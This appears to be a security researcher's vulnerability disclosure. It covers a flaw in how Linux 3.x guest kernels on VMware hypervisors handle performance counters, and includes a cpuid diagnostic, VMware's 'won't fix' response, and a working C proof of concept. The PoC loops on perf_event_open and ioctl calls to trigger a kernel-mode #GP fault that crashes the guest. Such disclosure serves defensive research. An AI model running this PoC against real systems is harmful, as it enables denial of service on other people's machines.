VMware + Linux 3.x PoC - Vitaly Nikolenko

This issue was reported to VMware on 29th April 2016 and was marked as "won't fix". It affects Linux 3.x kernels (including stable) running as guests on VMware hypervisors. Other Operating Systems may be affected. Other software hypervisors are not affected.

Description

The issue is related to emulating performance counters on VMware products with processors based on Intel Core microarchitecture. This issue was investigated on Linux only. Other Operating Systems may be affected.

When "Enable code profiling applications in this virtual machine" option is disabled (which is the default configuration), the rdpmcinstruction throws #GP for fixed-function performance counters 1<<30, 1<<30+1, 1<<30+2 both in user space (even when CR4.PCE = 1) and kernel space. According to the Intel specification: "Processors based on Intel Core microarchitecture provide three fixed-function performance counters. Bits beyond the width of the fixed counter are reserved and must be written as zeros. Model-specific fixed-function performance counters on processors that support Architectural Perfmon version 1 are 40 bits wide..." (Intel 64 and IA-32 Architectures, Software Developer's Manual, Volume 3 - Section 18.4.1). However, VMware products advertise the same family and model id's as the host CPU but remove fixed-function counters:

#include <stdio.h>
#include <stdint.h>

static inline void cpuid(int code, uint32_t *a, uint32_t *d) {
	asm volatile("cpuid"    : "=a"(*a),"=d"(*d)
				: "a"(code)
				: "ecx","ebx");
}
 
int main() {
	uint32_t a, d;

	cpuid(0x0a, &a, &d);
	printf("perfmon version: %d\n", a & 0xff);
	printf("fixed function counters: %d\n", d & 0xf);

	cpuid(1, &a, &d);
	printf("family id: %d\n", (a >> 4) & 0xf);
}


vnik@vm:~$ ./cpuid 
perfmon version: 1
fixed function counters: 0
family id: 6

Based on the advertised (by VMware) CPU family and perfmon version, 3.x Linux kernels set up the PMU accordingly with support for fixed-function counters.

According to the specification, the rdpmc instruction may throw a #GP in the protected mode either:

If the current privilege level is not 0 and the PCE flag in the CR4 register is clear.
If an invalid performance counter index is specified (see Table 4-13).

When #GP is trigged in user space, it's handled safely as if PCE was cleared (even if it's not). However, there's at least one path in Linux kernel 3.x, that reaches rdpmc in kernel space and triggers a #GP when the ECX value is 1<<30 to 1<<30+2. This fault is triggered in one of the ISRs at CPL=0, e.g., on our test system, it's triggered in x86_perf_event_update().

4.x kernels seem to be not affected by this issue. Some major changes were introduced to the perfmon counters implementation and vulnerable code was refactored.

The following is a proof of concept for 3.x kernels:

/**
 * VMware Linux guest - kernels 3.x PoC
 * Vitaly Nikolenko
 * vnik@cyseclabs.com
 * 
 * gcc vmware.c -o vmware
 */
#include <err.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/perf_event.h>
#include <asm/unistd.h>

static long
perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
		int cpu, int group_fd, unsigned long flags) {
	int ret;

	ret = syscall(__NR_perf_event_open, hw_event, pid, cpu,
			group_fd, flags);
	return ret;
}

int
main(int argc, char **argv) {
	struct perf_event_attr pe;
	long long count;
	int fd;

 	memset(&pe, 0, sizeof(struct perf_event_attr));
        pe.type = 0;
    	pe.size = sizeof(struct perf_event_attr);
    	pe.config = 9;
    	pe.disabled = 1;
    	pe.exclude_kernel = 1;
    	pe.exclude_hv = 1;

    	fd = perf_event_open(&pe, 0, -1, -1, 0);

 	if (fd == -1)
		perror("perf_event_open");
    
	ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);

	while (1 == 1) {
		putchar(0x62);
		ioctl(fd, PERF_EVENT_IOC_ENABLE, 1);
	}
}

Response from VMware

VMware investigated this issue and replied that they do not support fixed-function performance counters and thus generate a #GP at CPL=0. They believe this bug is not in their code but in the Linux kernel. They also believe that privilege escalation is not possible: "this #GP is handed over to the Linux kernel which should properly handle the CPL. So we do not believe that a escalation of privileges would be possible."

This was also reported to the Linux kernel developers but they're not eager to fix bugs related to closed-source hypervisors that don't adhere to the specification.